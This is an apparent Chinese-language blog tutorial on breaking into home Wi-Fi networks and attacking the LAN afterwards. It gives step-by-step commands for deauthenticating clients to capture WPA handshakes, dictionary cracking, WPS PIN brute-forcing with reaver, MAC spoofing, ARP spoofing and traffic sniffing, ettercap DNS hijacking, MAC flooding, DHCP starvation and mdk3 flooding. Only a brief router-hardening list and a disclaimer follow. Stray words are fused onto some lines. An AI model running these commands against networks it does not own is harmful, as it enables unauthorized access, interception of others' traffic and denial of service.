wifi滲透

前言

本文主要講述 家庭家庭家庭中(重要的事情說三遍,企業認證服務器的wifi通常很是很是的安全破解不來)如何破解wifi密碼,破解wifi密碼後的內網滲透利用(簡單說明),如何設置wifi路由器更安全,從滲透的方面看wifi安全,根據需求選擇觀看php

wifi滲透環境的打造

硬件方面

須要支持監聽模式的無線網卡,通常電腦自帶的無線網卡是不支持監聽模式的,須要購買
內置kail驅動 RT3070 RTL8187(推薦使用)
我購買的連接以下,用着還行,監聽信號比手機強那麼一點點
https://m.tb.cn/h.VGGIItU?sm=0b7bf6html

軟件方面

由於wifi破解須要軟件支持,Windows下載麻煩,推薦kali(由於kali自帶不少工具)
由於用到kali,建議使用vmware虛擬機,不建議小白雙系統kali或者Microsoft Store中的kali
vmware下載查看:https://www.52pojie.cn/thread-1026907-1-1.html
注意:無線網卡監聽模式時若是出現vmware卡代碼,監聽時間長就中止的狀況建議更換上面這個文章的vmware版本
kali的vm鏡像下載,下載解壓,vmware打開便可使用,下載地址: https://images.offensive-security.com/virtual-images/kali-linux-2020.2a-vmware-amd64.7z?_ga=2.152625529.1921388440.1596879427-46569499.1595490768linux

vmware和kali和無線網卡基礎知識(選看)

USB無線網卡在kali Linux的使用

  1. 先不要開機 先打開服務
  2. 運行下圖的
  3. 開機kali後 虛擬機選擇網卡的鏈接
  4. ifconfig 查看鏈接通常名字爲wlan,但有肯能無線網卡處於down狀態可用ifconfig -a查看,而後使ifconfig name up便可

無線網卡通常有四種工做模式,即 Managed,Master,Ad-hoc,Monitor。

Managed 模式:該模式用於你的無線客戶端直接與無線接入點(Access Point,即AP)進行接入鏈接。在這個模式中,咱們能夠進行無線接入internet上網,無線網卡的驅動程序依賴無線AP管理整個通訊過程。
Master 模式:一些無線網卡支持Master模式。這個模式容許無線網卡使用特製的驅動程序和軟件工做,做爲其餘設備的無線AP。它主要使用於無線接入點AP提供無線接入服務以及路由功能。好比無線路由器就是工做在Master模式下了,對於普通的pc機來講,若是有合適的硬件它也能夠變成一臺無線AP。
Ad hoc模式:當你的網絡由互相直連的設備組成時,就使用這個模式。在這個模式中,各設備之間採用對等網絡的方式進行鏈接,無線通訊雙方共同承擔無線AP的職責。
Monitor 模式:Monitor模式主要用於監控無線網絡內部的流量,用於檢查網絡和排錯。要使Wireshark捕獲無線數據包,你的無線網卡和配套驅動程序必須支持監聽模式(也叫RFMON模式)。git

kali橋接網卡上網


參見:https://www.linuxidc.com/Linux/2016-09/135521p3.htmgithub

wifi密碼的破解

由於wep加密已經沒有使用的,很是不安全,就忽略了web

最簡單最好用的wifi密碼破解方法

使用wifi萬能鑰匙,騰訊wifi管家等等,其原理就是wifi密碼共享,使用過該軟件會將你的鏈接過的wifi密碼共享出去,其自己不是破解而是共享制,鏈接後咱們就能夠看見密碼了,因此這種破解方法很是的好用,首先推薦算法

基礎說明airodump-ng

airmon-ng start wlan0     開啓監聽模式
airodump-ng wlan0mon      開始掃描附近wifi

airodump-ng wlan0mon參數:
-w 輸出文件
--ivs 只保存ivs,再也不保存全部無線數據,只是保存能夠用於破解的IVS數據報文
-c 指定信道
--bssid 指定路由的bssid也就是MAC地址
--essid 指定路由的essid,能夠理解爲wifi名稱(不許確)
airodump-ng wlan0mon 掃描參數

BSSID AP的MAC地址
PWR 信號強度接近0信號好
Beacons 無線ap的發送通告,告訴我是誰 週期發送
#Data 抓到的數據包
CH 信道
MB 最大傳輸速度
ENC 加密方法
CIPHER 加密算法
AUTH 認證協議
ESSID 通指wifi名字 <length: >表示未廣播
STATION 客戶端
RATE 傳輸速率
Lost 最近10秒的丟包數
Frames 來自客戶端的數據
Probes 主動彈出 若是客戶端正試圖鏈接一個AP但沒有連上,會顯示這裏
Aircrack-ng工具包數據庫

  • aircrack-ng 破解
  • airmon-ng 改變網卡工做模式
  • airodump-ng 捕獲報文
  • aireplay-ng 提供各類攻擊
  • airserv-ng 網卡鏈接到指定端口 用做無限跳板
  • airolib-ng 彩虹表破解建立數據庫文件
  • airdecap-ng 解包

WPA破解

指定監聽的wifi
airodump-ng -w [文件] --bssid [wifibssid] -c [信道最好指定] wlan0mon

管理針攻擊將其餘用戶踢下線
aireplay-ng -0 5 -a [路由bssid] -c [客戶端STATION] wlan0mon

管理針攻擊得到握手包

若是出現錯誤可嘗試
--ignore-negative-one 忽略-1信道
根據握手包暴力破解密碼
aircrack-ng -w [密碼字典] [握手包.cap]



根據握手包破解密碼加速
這裏推薦使用windows下GPU加速工具EWSA,還有其餘加速方式不過我不怎麼推薦,也能夠找專業的跑包團隊來跑包
EWSA下載和使用說明地址:https://www.52pojie.cn/thread-989800-1-1.html
找跑包地址:https://www.anywlan.com/forum-134-1.htmlwindows

ping攻擊 前提路由器開啓wps

8位ping碼,第8位數是校驗碼,只須要破解七位,ping碼分前部分(4位)後部分(3位),pin認證鏈接失敗,路由器返回EAP-NACK信息,經過迴應,可以肯定pin的前部分或後部分是否正確,因此可能性是11000(104+103),不過考慮信號和路由器的處理性能網卡功率等可能時間會長,若是信號好,網卡,路由器也比較好通常須要6個小時左右
查看開啓wps的wifi安全

wash -i wlan0mon


reaver -I wlan0mon -b [BSSID] -vv 還能夠加其餘參數 進行爆破

kali自動化工具wifite

原理:就是上面的命令只不過是自動化了
使用:cmd輸入wifite進入掃描

以爲掃描好了ctrl+c就好,按照序號選擇要破解的wifi便可,根據wifi開啓了啥會進行自動的破解,若是想跳過某個破解方式按ctrl+c便可,若是獲取到握手包自帶的密碼字典沒跑出來,能夠去上面提醒的路徑找握手包,用本身的字典跑

突破限制

mac地址限制

掃描查看已鏈接的客戶機的mac地址將網卡的mac地址改成其便可
先down掉網卡
ifconfig wlan0 down
修改mac地址
macchanger wlan0 -m [須要修改的mac地址,有些網卡可能不支持修改]
啓動網卡
ifconfig wlan0 up

未廣播ssid的wifi

1.等待其餘用戶鏈接,會先詢問ssid
airodump-ng wlan0mon 就能看見
2.將別人踢下線,讓其重連,和抓起握手包同樣,注意信道
aireplay-ng -0 5 -a [路由bssid] -c [客戶端STATION]

鏈接wifi後的利用(內網滲透)

ARP欺騙

查看內網的主機
nmap -sP 192.168.1.0/24 -v

開啓轉發模式

echo 1 > /proc/sys/net/ipv4/ip_forward

雙向欺騙分別是目標主機ip和網關
arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.106
arpspoof -i eth0 -t 192.168.1.106 -r 192.168.1.1


啓動wireshare查看ip.src == 192.168.1.106,發現欺騙成功能夠攔截他的訪問

driftnet -i eth0 監聽圖片

毒化內網用戶沒法上網

原理:進行arp欺騙但不進行轉發
echo 0 > /proc/sys/net/ipv4/ip_forward
雙向欺騙
arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.106
arpspoof -i eth0 -t 192.168.1.106 -r 192.168.1.1

dns劫持

目標主機window7 ip地址 192.168.124.128
攻擊機kali ip地址 192.168.124.139
劫持到web服務window10(phpstudy) ip地址 192.168.1.104
修改配置文件nano /etc/ettercap/etter.dns

ettercap -Tq -i eth0 -P dns_spoof /// ///
進行欺騙-i後是無線網卡 ///中加目標主機和網卡,不加就是所有,發現window7被劫持成功,若是安裝殺毒軟件可能劫持不了


如何恢復

ipconfig/flushdns刷新便可

mac地址表泛紅

交換機中有mac地址表記錄鏈接的pc,攻擊者不斷刷新mac地址來填滿交換機的mac地址表,交換機在mac地址表找不到該用戶只能經過廣播的形式發送,攻擊者就能夠截獲數據
交換機設置靜態mac地址綁定可預防,非表內請求將所有丟棄

macof -i eth0

dhcp地址耗盡攻擊

路由器分配ip,攻擊者發送大量discover包來獲取ip讓其者無ip使用,沒法鏈接
先安裝
apt-get install yersinia
啓動
yersinia -G

干擾通信

如下利用前提無線網卡要開啓監聽模式

建立惡意的無線熱點

工具mdk3 mdk3可查看使用說明

mdk3 wlan0mon b -n SSID (-f 能夠導入列表建立多個ssidwifi,不指定則隨機) -c [信道] -w -g -s 100

驗證洪水攻擊(攻擊路由器)

僞造大量的client去鏈接ap,可致使正在已鏈接用戶無反應 -a後加交換機ssid

mdk3 wlan0mon a -a FC:D7:33:DE:F3:8A -c  -s 300

強制解除驗證洪水攻擊方式(針對客戶機使其下線,經過模仿管理針)

就是以前抓握手包同樣將別人踢下線

aireplay-ng -0 5 -a [路由bssid] -c [客戶端STATION] wlan0mon

用mdk3針對全網,在攻擊中踢掉線後也沒法鏈接成功

mdk3 wlan0mon d

可-b 加文件指定mac地址攻擊

如何設置路由器更安全

攻與防護自己就是一場博弈根據上面的攻擊方式咱們能夠設置路由器是wifi更安全尤爲是物聯網的發展,家裏的不少東西都要鏈接網絡

  1. wifi加密方式採用wpa加密,不用採用wpe加密,若是不懂wps,也不要開啓wps功能
  2. wifi密碼要不要使用弱口令
  3. 對於經常使用設備能夠進行ip和mac的綁定
  4. 若是沒有用戶之間相互訪問的需求能夠開啓ap隔離
  5. 能夠設置訪客wifi,防止密碼被泄露
  6. 就是選用一些比較好的路由器,防止路由器自己存在漏洞,路由器頁面就是web頁面可能存在漏洞
  7. 儘可能少使用wifi萬能鑰匙,騰訊wifi管家等,或者使用時找到裏面的設置不共享本身的wifi密碼

參考文章

b站:https://www.bilibili.com/video/BV1e7411o7GB?p=1
b站:https://www.bilibili.com/video/BV14z4y1Q7Nb?from=search&seid=10037556429710890008
論壇:https://www.anywlan.com/
等等等不少前輩的文章,無法都列舉(找不到了),表示抱歉和感謝
最後歡迎訪問個人我的博客:https://lmg66.github.io/ 說明:本文僅限技術研究與討論,嚴禁用於非法用途,不然產生的一切後果自行承擔

相關文章
相關標籤/搜索